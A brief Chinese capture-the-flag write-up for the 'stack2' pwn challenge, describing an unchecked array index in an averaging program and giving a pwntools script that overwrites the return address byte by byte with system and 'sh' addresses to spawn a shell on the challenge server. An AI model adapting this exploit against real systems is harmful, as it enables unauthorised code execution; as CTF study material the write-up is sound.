stack2

check一下，发现开了NX和canary

image.png

拖进ida，发现是一个求平均数的程序，有system和/bin/bash

image.png

image.png

发现栈溢出，在j处，没有控制其小于100，所以栈溢出为0x84

image.png

image.png

脚本

system_addr=0x080485AF
leave_offset=0x84
 
 
def write_addr(addr,va):
    io.sendline("3")
    io.recvuntil("which number to change:\n")
    io.sendline(str(addr))
    io.recvuntil("new number:\n")
    io.sendline(str(va))
    io.recvuntil("5. exit\n")
 
io=remote('111.198.29.45','34639')
io.recvuntil("How many numbers you have:\n")
io.sendline("1")
io.recvuntil("Give me your numbers\n")
io.sendline("1")
io.recvuntil("5. exit\n")
#将system的地址写入，小端序
write_addr(leave_offset,0X50)
write_addr(leave_offset+1,0X84)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
# sh_addr  0x08048987 ？？这个我不太清楚
leave_offset+=8
print leave_offset
write_addr(leave_offset,0x87)
write_addr(leave_offset+1,0X89)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
 
io.sendline("5")
io.interactive()